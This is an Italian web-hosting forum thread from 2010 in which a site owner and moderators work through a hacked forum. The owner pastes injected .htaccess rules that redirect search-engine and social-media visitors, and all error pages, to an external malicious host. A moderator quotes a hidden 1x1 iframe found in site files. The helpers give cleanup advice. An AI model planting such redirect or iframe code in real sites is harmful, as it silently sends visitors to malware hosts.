LinkBack URL
About LinkBacksera un errore che mi dava da un paio di giorni ma solo per i messaggi adesso invece è di continuo.
premesso che ho un database 3 la mia banda no supera il 30%
e le mie impostazioni server sono:impossibili da recuperre perche mi da il seguente errore
Not Found
The requested URL /go.php was not found on this server.
Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Server at cdkkru322.co.cc Port 8080
ma prima che tutto impazzisse avevo controllato ed era tutto apposto.
il mio forum altervista è
http://floflello.altervista.org/forum/
è colpa vostra??? e se si quando pensate chepossa tornare tutto normale???
grazie e buon lavoro
Visualizzazione risultati 1 fino 9 di 9
Discussione: Redirect verso sito malevolo
-
22-11-2010, 21.57.43 #1Guest
Redirect verso sito malevolo
-
22-11-2010, 22.31.27 #2Guest
Il tuo sito è stato infettato da un virus. Controlla se non sia lui a creare questi problemi.
-
22-11-2010, 23.36.09 #3
Super Moderatore
- Data registrazione
- 02-06-2009
- Messaggi
- 1,981
Aggiungo che il codice malevolo si trova nei file .htaccess, della root e della cartella forum. Posta il codice così vediamo cosa bisogna rimuovere.
Ultima modifica di andreafallico : 23-11-2010 alle ore 00.30.07
-
23-11-2010, 13.14.58 #4Guest
hacces-forum
hacces-rootCodice:RewriteEngine On ErrorDocument 400 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 401 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 403 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 404 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 500 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 502 h**p://cdkkru322.co.cc/go.php?sid=1 RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ h**p://cdkkru322.co.cc/go.php?sid=1 [R=301,L]
grazie mille non avevo nessuna idea che si potesse infettare il lato server.Codice:RewriteEngine On ErrorDocument 400 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 401 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 403 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 404 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 500 h**p://cdkkru322.co.cc/go.php?sid=1 ErrorDocument 502 h**p://cdkkru322.co.cc/go.php?sid=1 RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ h**p://cdkkru322.co.cc/go.php?sid=1 [R=301,L] # # av:Toolbar SetEnv AV_TOOLBAR 1
pensate si possa rivolvere o mi conviene fare un ripristino???
grazie dell'aiutoUltima modifica di andreafallico : 23-11-2010 alle ore 13.21.20
-
23-11-2010, 13.18.25 #5
Community Manager
- Data registrazione
- 21-10-2003
- Residenza
- Brusasco (To)
- Messaggi
- 4,909
Si può sicuramente rimuovere tutto (ma bisogna vedere cosa c'era prima nell' htaccess), ma è altrettanto importante capire perché è stato compromesso in quel modo il file:
- eseguire una bella scansione del pc che utilizzi per aggiornare il sito web (con un buon antivirus)
- modificare tutte le credenziali di accesso
- aggiornare eventuali applicativi che hai installato sull'account.Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...
ASD Brusasco - C'è altro sport oltre al calcio!
"Io sono vivo, voi siete morti" (Philip Dick, Ubik)
-
23-11-2010, 23.42.27 #6Guest
allora adesso ho rimosso i file hacces
e mi ha dato questa errore.
allora ho fatto un dumb di un back up vecchio, ma l'errore persiste. e non riesco ad entrare nel pannello di amministrazione per controllare le impostazioni server cosa posso fare???
La pagina http://floflello.altervista.org/foru...f204666ab93a01 non è presente, questo può
aiuto!!!!!!!!
-
24-11-2010, 00.02.38 #7Guest
Il virus è ancora presente.
Prima di cambiare le password, devi scansionare il tuo pc per vedere che non sia infettato da qualche virus. Preferibilmente usa Antivir, altro che Avast o AVG che da una nota rivista informatica hanno avuto sempre voti bassi (sotto il 5)
È altresì fondamentale farlo con uno online.
Dopo che hai rimosso virus, spyware e quant'altro, procedi al cambio della password del sito.
-
24-11-2010, 15.26.39 #8Guest
no. avevo fatto gia la cansione approfondita con avira.
mi sapete dire che errore è forum:8080 e se si possibile sistemarlo????
aiuto adesso provo con un back up piu vecchio . ma ho
poche speranze
per favore aiutatemiiiiiiiii.
un ora dopo. hoeliminato manualmente una ventina di htacces con data 11/11/10 maledetto giorno.
risultato alla prima occasione mi ridava l'erroreforum:8080 in più tutti i htacces erano dinuovo li.
come ho detto ho fatto una scansione al mio pc con avira e nessun virus. cosa posso fare. mi sa che l'unica è che intervenga altervista di suo. ma come si fa a contattarli???Ultima modifica di floflello : 24-11-2010 alle ore 16.00.54
-
24-11-2010, 23.40.37 #9
Super Moderatore
- Data registrazione
- 02-06-2009
- Messaggi
- 1,981
Ora il problema è un altro, c'è del codice malevolo (scan online) nei file:
rimuovi il codice in tutti i file e come ha detto dapeco, devi cambiare le password e fare una scansione del pc anche con Malwarebytes' Anti-Malware.Codice HTML:<iframe src="http://www.arrig......" width="1" height="1" frameborder="0"></iframe>
Invece per l'htaccess puoi guardare qui http://lab.andrea-fallico.it/htscan/...ltervista.org/Ultima modifica di andreafallico : 24-11-2010 alle ore 23.53.30
